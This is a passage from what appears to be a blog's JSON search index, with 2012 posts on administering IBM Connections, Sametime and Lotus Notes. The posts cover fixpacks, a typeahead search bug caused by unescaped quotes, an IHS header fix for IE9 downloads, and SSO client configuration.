PM51310.\n","excerpt":"\u003cp\u003eThe new fixpack for IBM Connections 3.0.1 is available. You can download\nthe nearly 1 GB sized file on\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm/Lotus\u0026amp;product=ibm/Lotus/Lotus\u0026#43;Connections\u0026amp;release=All\u0026amp;platform=All\u0026amp;function=fixId\u0026amp;fixids=3.0.1.0-LC-Multi-FP001\u0026amp;includeSupersedes=0\u0026amp;source=fc\" target=\"_blank\"\u003eIBM\nFixcentral. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eFixlist and installation instructions are linked on Fix Central.\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eSome details of the\n\u003ca href=\"https://www-304.ibm.com/support/docview.wss?uid=swg21584430\" target=\"_blank\"\u003eReadme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003ch2 id=\"prerequists\"\u003ePrerequists \u003ca href=\"#prerequists\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eWebSphere Application Server fixes: PM56596 and ​PM51310​ to WAS\n7.0.0.x. Please contact IBM WebSphere Application Server support to\nobtain the fixes.​\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eIntegration with Sametime 8.5.2 requires Sametime hotfix OBEN-8SDLGS.\nPlease contact IBM Sametime support to obtain the fix.​\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSo no direct download of the prerequists! You have to contact IBM\nSupport for these downloads.\u003c/p\u003e\n\u003ch1 id=\"update-21032012\"\u003eUpdate 21.03.2012 \u003ca href=\"#update-21032012\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eIBM changes the Readme for this Fixpack. They deleted the prerequisted\nWAS Fixes. So you can install without PM56596 and PM51310.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-22-fp01-for-ibm-connections-is-available/","title":"FP01 for IBM Connections is available (Update)"},{"body":"The required fix OBEN-85DLGS for IBM Connections 3.0.1.1 is available for download at IBM Fix Central now.\nCite from Fix Readme :\nInstallation instructions\nPrerequisite: The Sametime System Console must be at version 8.5.2 IFR\nIf not, then you will see a failure message during the fix install noting an incorrect version level. Refer to Installing Sametime 8.5.2 Interim Feature Release 1 on the Sametime System Console to get started . This fix must be installed on top of a Sametime Proxy Server 8.5.2 Interim Feature Release 1 (IFR 1). If the server is running 8.5.2 (without the IFR 1 fix), then the IFR 1 fix will be automatically installed.\n","excerpt":"\u003cp\u003eThe required\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~WebSphere\u0026amp;product=ibm/WebSphere/WebSphere\u0026#43;Application\u0026#43;Server\u0026amp;release=All\u0026amp;platform=Linux\u0026#43;64-bit,x86_64\u0026amp;function=fixId\u0026amp;fixids=8521-Sametime-Proxy-IF-OBEN-8SDLGS\u0026amp;includeSupersedes=0\u0026amp;source=fc\" target=\"_blank\"\u003efix\nOBEN-85DLGS \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for IBM Connections 3.0.1.1 is available for download at\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral\" target=\"_blank\"\u003eIBM Fix Central \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n now.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/2012-03-21_16-36-17.png\" alt=\"2012 03 21 16 36 17\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eCite from \u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21588293\" target=\"_blank\"\u003eFix\nReadme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eInstallation instructions\u003c/strong\u003e\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003ePrerequisite:\u003c/strong\u003e The Sametime System Console must be at version 8.5.2 IFR\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eIf not, then you will see a failure message during the fix install\nnoting an incorrect version level. Refer to\n\u003ca href=\"http://www.lotus.com/ldd/stwiki.nsf/dx/Installing_Sametime_8.5.2_Interim_Feature_Release_1_on_the_Sametime_System_Console_st852ifr1\" target=\"_blank\"\u003eInstalling\nSametime 8.5.2 Interim Feature Release 1 on the Sametime System Console\nto get started \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/li\u003e\n\u003c/ol\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThis fix must be installed on top of a Sametime Proxy Server 8.5.2\nInterim Feature Release 1 (IFR 1). If the server is running 8.5.2\n(without the IFR 1 fix), then the IFR 1 fix will be automatically\ninstalled.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-21-sametime-fix-oben-85dlgs-available/","title":"Sametime Fix OBEN-85DLGS available"},{"body":"On one of my IBM Connections Site i had a problem with directory search (better the typeahead search). When we searched single characters no business cards are displayed.\nI use Firebug for Chrome here and you see, that the search gets an result back from Connections, but no business cards are displayed.\nWhen i open this get statement i get a list of profile documents in JSON format:\nIn this case i a got a list of about 20 User profiles. When i search a little bit more detailed i get an error of a Javascript, which should interpret the JSON list. Thanks to the developer (I think it is a dojo script)! “There was an error!” is a great response for troubleshooting and searching the error on Google or Bing!\nThe list has following format:\n{ \u0026#34;identifier\u0026#34;:\u0026#34;member\u0026#34;, \u0026#34;label\u0026#34;:\u0026#34;name\u0026#34;, \u0026#34;items\u0026#34;:[ { \u0026#34;name\u0026#34;:\u0026#34;John Doe\u0026#34;, \u0026#34;userid\u0026#34;:\u0026#34;70026A2C-BE77-8491-C125-XXXXXX\u0026#34;, \u0026#34;uid\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;member\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;type\u0026#34;:\u0026#34;0\u0026#34;, \u0026#34;ext\u0026#34;:{ \u0026#34;first\u0026#34;:\u0026#34;\u0026#34;, \u0026#34;groupwareEmail\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;guid\u0026#34;:\u0026#34;70026A2C-BE77-8491-C125-XXXXX\u0026#34;, \u0026#34;mobileNumber\u0026#34;:\u0026#34;+49 (123) 12 34 567\u0026#34;, \u0026#34;floor\u0026#34;:\u0026#34;2nd\u0026#34;, \u0026#34;email\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;countryCode\u0026#34;:\u0026#34;DE\u0026#34;, \u0026#34;givenName\u0026#34;:\u0026#34;John\u0026#34;, \u0026#34;jobResp\u0026#34;:\u0026#34;Assistant\u0026#34;, \u0026#34;faxNumber\u0026#34;:\u0026#34;+49 (123) 456789\u0026#34;, \u0026#34;bldgId\u0026#34;:\u0026#34;Member of \u0026#34;Android Lovers\u0026#34;\u0026#34;, \u0026#34;uid\u0026#34;:\u0026#34;john.doe@stoeps.tld\u0026#34;, \u0026#34;sourceUrl\u0026#34;:\u0026#34;ldap://ldapserver:389/(undefined=_search_base_)?(\u0026amp;(ObjectClass=*)(Attribute=1))\u0026#34;, \u0026#34;surname\u0026#34;:\u0026#34;Doe\u0026#34;, \u0026#34;key\u0026#34;:\u0026#34;00009asdkfjakf\u0026#34;, \u0026#34;displayName\u0026#34;:\u0026#34;John Doe\u0026#34;, \u0026#34;telephoneNumber\u0026#34;:\u0026#34;+49 (1234) 56789\u0026#34;, \u0026#34;distinguishedName\u0026#34;:\u0026#34;CN=John Doe,OU=Admin,OU=DE,O=STOEPS\u0026#34;, \u0026#34;workLocationCode\u0026#34;:\u0026#34;Munich\u0026#34;, \u0026#34;timezone\u0026#34;:\u0026#34;Etc/GMT+12\u0026#34;, \u0026#34;lastUpdate\u0026#34;:\u0026#34;2012-03-05 14:23:34.504\u0026#34; } } ] } Problem here is the field bldgId: \u0026quot;Member of \u0026quot;Android Lovers\u0026quot;\u0026quot;.\nYou can see double ” which are not masked. Our IBM Connections User can fill nearly everything in the fields in Profiles, but get no warning if he uses quotes and quotes are not masked, when they are stored in the database.\nSo when you have on user who uses quotes in one of his Profile fields, the typeahead search displays no results for character searches which contains this user (and no error message).\nFinding such fields with regular expressions I tested the typeahead search on all characters and copied the result of the GET statement out of Firebug and developed a regexp to find double quoted strings:\n:\\\u0026quot;\\\u0026quot;[a-zA-Z0-9\\.\\/\\+\\-\\:\\s äöüÄÖÜ]\\\u0026quot;\nOn Mac OS X you can use RegExRX or Notepad++ on Windows to test this regexp and you will get the wrong field values.\nTDI and Typeahead You can see in the result list, that TDI Search Urls are saved in each profile document too! \u0026quot;sourceUrl\u0026quot;:\u0026quot;ldap://ldapserver:389/(undefined=search_base)?(\u0026amp;(ObjectClass=*)(Attribute=1))\u0026quot;, so please be careful, when you configure your search strings, because a double quoted attribute breaks typeahead search too!\n","excerpt":"\u003cp\u003eOn one of my IBM Connections Site i had a problem with directory search\n(better the typeahead search). When we searched single characters no\nbusiness cards are displayed.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/2012-03-19_13-18-11.png\" alt=\"2012 03 19 13 18 11\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI use Firebug for Chrome here and you see, that the search gets an\nresult back from Connections, but no business cards are displayed.\u003c/p\u003e\n\u003cp\u003eWhen i open this get statement i get a list of profile documents in JSON\nformat:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/2012-03-19_13-23-48.png\" alt=\"2012 03 19 13 23 48\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eIn this case i a got a list of about 20 User profiles. When i search a\nlittle bit more detailed i get an error of a Javascript, which should\ninterpret the JSON list. Thanks to the developer (I think it is a dojo\nscript)! “There was an error!” is a great response for troubleshooting\nand searching the error on Google or Bing!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-19-ibm-connections-directory-search-breaks-when-user-have-in-a-profile-field/","title":"IBM Connections Directory Search breaks when User have quotes in a profile field"},{"body":"File download with Internet Explorer 9 modifies the file extension and so files can’t open with any installed application. Problem occurs with IBM Connections 3.0.1 and 3.0.1 with installed CR3.\nIE 9 isn’t supported in the moment, but with a little tweak on IHS side, it is possible, that IE 9 download files without modifying the extension.\nBiggest problem here is, that opening attachments will open the “Open with” dialog, because no application is linked to a file extension .pdf .\nNormal file download with IE9 and IBM Connections: The http header shows following line for the download file and the name:\nContent-Disposition: attachment; filename*=UTF-8\u0026#39;en\u0026#39;%42%6f%6e%75%73%20%53%79%73%74%65%6d%20%76%32%2e%70%70%74%78; size=2563575; creation-date=\u0026#34;Fri, 2 Mar 2012 13:37:39 +0100\u0026#34;; modification-date=\u0026#34;Fri, 2 Mar 2012 13:37:39 +0100\u0026#34;; Sjaak Ursinus shows modifying http headers to solve issues with Chrome and IBM Connections Files . I made some tests with his explanation and added some lines in http.conf (you have to enable mod_headers and mod_setenvif):\n\u0026lt;IfModule mod_setenvif.c\u0026gt; SetEnvIf User-Agent \u0026#34;MSIE 9\\.\u0026#34; IE9 \u0026lt;IfModule mod_headers.c\u0026gt; Header edit Content-Disposition \u0026#34;^(.*)filename\\*=UTF-8[\u0026#39;a-z]{4}(.*)$\u0026#34; \u0026#34;$1filename*=$2\u0026#34; env=IE9 \u0026lt;/IfModule\u0026gt; \u0026lt;/IfModule\u0026gt;\u0026lt;br /\u0026gt; What does this part of the http.conf? I set an environment variable IE9, if the user agent contains “MSIE 9”.\nThe Header edit removes UTF-8’de’ from filename, if the environment variable is IE9 (env=IE9). I modified the regexp, that all languages after UTF-8 were removed. So the http header looks like this:\nContent-Disposition: attachment; filename*=%43%41%54%20%53%63%68%6c%c3%bc%73%73%65%6c%2e%65%6d%6c; size=7637; creation-date=\u0026#34;Fri, 30 Dec 2011 10:44:20 +0100\u0026#34;; modification-date=\u0026#34;Fri, 30 Dec 2011 10:44:20 +0100\u0026#34;; So you can open the file and it will be opened with the linked application for this extension.\n","excerpt":"\u003cp\u003eFile download with Internet Explorer 9 modifies the file extension and\nso files can’t open with any installed application. Problem occurs with\nIBM Connections 3.0.1 and 3.0.1 with installed CR3.\u003c/p\u003e\n\u003cp\u003eIE 9 isn’t supported in the moment, but with a little tweak on IHS side,\nit is possible, that IE 9 download files without modifying the\nextension.\u003c/p\u003e\n\u003cp\u003eBiggest problem here is, that opening attachments will open the “Open\nwith” dialog, because no application is linked to a file extension\n.pdf\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/ie9-download-1.png\" alt=\"1\" /\u003e\n\u003c/p\u003e\n\n.\u003c/p\u003e\n\u003ch1 id=\"normal-file-download-with-ie9-and-ibm-connections\"\u003eNormal file download with IE9 and IBM Connections: \u003ca href=\"#normal-file-download-with-ie9-and-ibm-connections\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/ie9-download-1.png\" alt=\"ie9 download 1\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eThe http header shows following line for the download file and the name:\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-15-ibm-connections-file-download-with-ie-9-without-1-on-extension/","title":"IBM Connections: File download with IE 9 without \\[1\\] on extension"},{"body":"A good evening for my all time open things list.\nSjaak Ursinus postet the reason and solution why Chrome throws an error when you want to download from IBM Connections Files.\nAmanda Baumann postet the configuration to integrate Sametime Proxy in IBM Connections and use only IHS (IBM HTTPServer). No edge or squid is necessary.\nGreat job! Thanks a lot to both for sharing this information.\n","excerpt":"\u003cp\u003eA good evening for my all time open things list.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-10.lotus.com/ldd/lcforum.nsf/DateAllFlatWeb/1b49e91c56f15654c12579bb005023a3?OpenDocument\" target=\"_blank\"\u003eSjaak Ursinus postet the reason and solution \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n why Chrome throws an\nerror when you want to download from IBM Connections Files.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/8.1.1_Connections_integration_with_STProxy_for_chat_and_awareness\" target=\"_blank\"\u003eAmanda Baumann postet the configuration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to integrate Sametime Proxy\nin IBM Connections and use only IHS (IBM HTTPServer). No edge or squid\nis necessary.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eGreat job! Thanks a lot to both for sharing this information.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-09-two-things-solved-today/","title":"Two things solved today"},{"body":"I often install IBM Connections on localised operating systems, so normally DB2 control center get started with a non-english language.\nInterface language in DB2 control center can be changed through environment variable DB2LANG. After setting DB2LANG=EN and restart db2cc i get a english interface.\n","excerpt":"\u003cp\u003eI often install IBM Connections on localised operating systems, so\nnormally DB2 control center get started with a non-english language.\u003c/p\u003e\n\u003cp\u003eInterface language in DB2 control center can be changed through\nenvironment variable DB2LANG. After setting DB2LANG=EN and restart db2cc\ni get a english interface.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-07-changing-interface-language-in-db2-control-center/","title":"Changing interface language in DB2 Control Center"},{"body":"The last two weeks i installed two IBM Connections 3.0.1.\nAfter installing i went to IBM Fix Central and look for the latest fixes. There are 7 Fixes available and for Multi Mobile Patch it shows a superseded fix. So i decided to download patch one to seven and ignored july mobile update.\nI installed the fixes as ever.\nUpdating updateinstaller\nDisabled node synchronisation\nDisabled Application Server automatic starting\nshut down the Clusters\nsynchronize nodes\nand so on.\nAfter the installation i can’t use the mobile apps for iOS, android or Blackberry. The error messages shows “You have to install the July 2011 mobile patch to use this app.”\nI made a download on Fix Central again, because i thought i made an error to ignore the july patch (LO61851), so i mark LO64399 (October Patch) to download and activated “Include requisites: Yes” and got following download options:\nNo other patch is shown as prerequist for this mobile patch! But i downloaded july fix (LO61851) to test this one.\nI uninstalled LO64399 and startet again with LO61851. No success! After restarting i installed LO64399, but no mobile App works.\nShazza Bellamy gave me the hint to install the august mobile fix (LO63049). I searched on Fix Central, but no download was available. One of my colleagues stored the patch on our NAS and she sent it to me too. After uninstalling the other two mobile fixes i installed august fix (LO63049) and restartet again and what should i say? On both Connections Installations the mobile Apps are working.\nI don’t know why LO63049 isn’t available on Fix Central and i have no idea why LO61851 is not enough for mobile Apps on my new installations. I have older systems which are updated from 2.5 or 3.0 where only LO61851 is installed and mobile apps are working.\nPerhaps i can save you time with this post, because i invested some days on discovering the error and installing fixes again and again.\nUpdate: Today i read a post on IBM Developerworks, which describes the error and a solution. Sjaak Ursinus found the reason of the failing update: ifix LO64399 and Windows 2008 R2 ","excerpt":"\u003cp\u003eThe last two weeks i installed two IBM Connections 3.0.1.\u003c/p\u003e\n\u003cp\u003eAfter installing i went to \u003ca href=\"http://www-933.ibm.com/support/fixcentral\" target=\"_blank\"\u003eIBM Fix Central \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and look for the latest\nfixes. There are \u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Lotus\u0026amp;product=ibm/Lotus/Lotus\u0026#43;Connections\u0026amp;release=3.0.1.0\u0026amp;platform=Windows\u0026amp;function=all\u0026amp;source=fc\" target=\"_blank\"\u003e7 Fixes available \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and for Multi Mobile Patch it shows a\nsuperseded fix. So i decided to download patch one to seven and ignored\njuly mobile update.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/03/fixcentral1.png\" alt=\"fixcentral1\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI installed the fixes as ever.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpdating updateinstaller\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDisabled node synchronisation\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDisabled Application Server automatic starting\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eshut down the Clusters\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003esynchronize nodes\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eand so on.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eAfter the installation i can’t use the mobile apps for iOS, android or\nBlackberry. The error messages shows “You have to install the July 2011\nmobile patch to use this app.”\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-03-02-problems-with-mobile-fix-and-ibm-connections-3-0-1/","title":"Problems with Mobile Fix and IBM Connections 3.0.1"},{"body":"Last week a new blog editor for offline blogging has announced IBM Connections blogs support.\nBlogsy is a nice tool and costs about 4€ in apple app store.\nMy first tests are not very good, because Blogsy 3.3 has problems with multiple Blogs in IBM Connections. Only one day later, after some comments in Blogsy Blog, a new version can be downloaded from Appstore. Blogsy 3.3.1 can handle multiple Connections blogs, but the App crashes right after uploading a new post. I hope they will make a updated version soon.\nI enjoy offline blog editors very much, because i can prepare articles on train and upload them later after i found a free WLAN. This is my first non-test post with Blogsy. Integration is very good and you have quick access to web content, Youtube and Flickr.\n","excerpt":"\u003cp\u003eLast week a new blog editor for offline blogging has announced IBM\nConnections blogs support.\u003c/p\u003e\n\u003cp\u003eBlogsy is a nice tool and costs about 4€ in apple app store.\u003c/p\u003e\n\u003cp\u003eMy first tests are not very good, because Blogsy 3.3 has problems with\nmultiple Blogs in IBM Connections. Only one day later, after some\ncomments in Blogsy Blog, a new version can be downloaded from Appstore.\nBlogsy 3.3.1 can handle multiple Connections blogs, but the App crashes\nright after uploading a new post. I hope they will make a updated\nversion soon.\u003c/p\u003e\n\u003cp\u003eI enjoy offline blog editors very much, because i can prepare articles\non train and upload them later after i found a free WLAN. This is my\nfirst non-test post with Blogsy. Integration is very good and you have\nquick access to web content, Youtube and Flickr.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-02-26-first-steps-with-blogsy-on-ipad/","title":"First steps with blogsy on iPad"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/plugin%5C_customization.ini/","title":"Plugin\\_customization.ini"},{"body":"Some more points to my working configuration of Single Sign-On in Lotus Notes.\nAutomating configuration with plugin_customization.ini I do a lot of software tests with my productive Notes Client (on Mac OS), so i often delete the Expeditor-folder in ~/Library/Application Support/Lotus Notes Data/. So i place configuration details in /Applications/Notes.app/Contents/MacOS/rcp/plugin_customization.ini, then the settings get automatically applied.\n# Connections Config com.ibm.lconn.client.base/server=http\\://connections.example.com/profiles com.ibm.lconn.client.base/authtype=DOMINO-SSO com.ibm.lconn.client.base/dominosso.dominoresolveservername=false com.ibm.lconn.client.base/authserver=$hierarchical Domino-Server-Name$ com.ibm.lconn.client.base/dominosso.useclustermates=true com.ibm.lconn.client.base/dominosso.preferred.username.field=ShortName com.ibm.lconn.client.base/policy-mode=OVERWRITE com.ibm.lconn.client.base/enableConnectionsIntegration=true # Sametime Config com.ibm.collaboration.realtime.community/name=$Name for Community$ com.ibm.collaboration.realtime.community/host=$Hostname of Sametime Server$ com.ibm.collaboration.realtime.community/defaultAuthType=ST-DOMINO-SSO com.ibm.collaboration.realtime.community/authServerUrl=$hierarchical Domino Server Name$ com.ibm.collaboration.realtime.community/loginByToken=true com.ibm.collaboration.realtime.community/tokenLoginOnly=true com.ibm.collaboration.realtime.community/loginAtStartup=true com.ibm.collaboration.realtime.login/autologin=true com.ibm.collaboration.realtime.login/alwaysLoggedIn=true com.ibm.collaboration.realtime.imhub/disableExit=false # Status Updater Fix to show profile pictures com.ibm.lconn.statusupdates/download.image.enabled=true Sametime will only apply the settings of plugin_customization.ini, when following file is not present!\n~/Library/Application Support/Lotus Notes Data/Expeditor/Applications/.metadata/.plugins/com.ibm.collaboration.realtime.login/CANONICAL_NAME.xml Applying these settings through a Desktop setting document and policy You can apply this through a policy too, you have to add the values to a Desktop settings document. Syntax is described here: IBM KB 21407709 .\nThere is a bug in the desktop settings document until Notes / Domino 8.5.3, you can’t delete the entries.\nDetails:\nDomino 8.5.1 Custom Notes.Ini Settings still active SPR # RNOG84RS36 fixed in 8.5.2 release Comments on Detlef Poettgen tells, that error is still active in 8.5.2 FP3, i tested 8.5.3 and it works.\nPlease be aware, that Domino Directory allows stored forms and if you want to delete Managed Settings of an Desktop settings document which is created before 8.5.3, the error still occurs.\nPath in Windows Installations Expeditorfolder is NotesData\nPath to plugin_customization.ini: NotesProgram\n","excerpt":"\u003cp\u003eSome more points to my working configuration of Single Sign-On in Lotus\nNotes.\u003c/p\u003e\n\u003ch1 id=\"automating-configuration-with-plugin_customizationini\"\u003eAutomating configuration with plugin_customization.ini \u003ca href=\"#automating-configuration-with-plugin_customizationini\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eI do a lot of software tests with my productive Notes Client (on Mac\nOS), so i often delete the Expeditor-folder in ~/Library/Application\nSupport/Lotus Notes Data/. So i place configuration details in\n/Applications/Notes.app/Contents/MacOS/rcp/plugin_customization.ini,\nthen the settings get automatically applied.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# Connections Config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/server=http\u003cspan style=\"color:#2aa198\"\u003e\\:\u003c/span\u003e//connections.example.com/profiles\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/authtype=DOMINO-SSO\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/dominosso.dominoresolveservername=\u003cspan style=\"color:#cb4b16\"\u003efalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/authserver=\u003cspan style=\"color:#268bd2\"\u003e$hierarchical\u003c/span\u003e Domino-Server-Name$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/dominosso.useclustermates=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/dominosso.preferred.username.field=ShortName\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/policy-mode=OVERWRITE\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.client.base/enableConnectionsIntegration=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# Sametime Config\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/name=\u003cspan style=\"color:#268bd2\"\u003e$Name\u003c/span\u003e \u003cspan style=\"color:#859900\"\u003efor\u003c/span\u003e Community$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/host=\u003cspan style=\"color:#268bd2\"\u003e$Hostname\u003c/span\u003e of Sametime Server$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/defaultAuthType=ST-DOMINO-SSO\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/authServerUrl=\u003cspan style=\"color:#268bd2\"\u003e$hierarchical\u003c/span\u003e Domino Server Name$\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/loginByToken=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/tokenLoginOnly=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.community/loginAtStartup=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.login/autologin=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.login/alwaysLoggedIn=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.collaboration.realtime.imhub/disableExit=\u003cspan style=\"color:#cb4b16\"\u003efalse\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# Status Updater Fix to show profile pictures\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e com.ibm.lconn.statusupdates/download.image.enabled=\u003cspan style=\"color:#cb4b16\"\u003etrue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eSametime will only apply the settings of plugin_customization.ini, when\nfollowing file is \u003cstrong\u003enot\u003c/strong\u003e 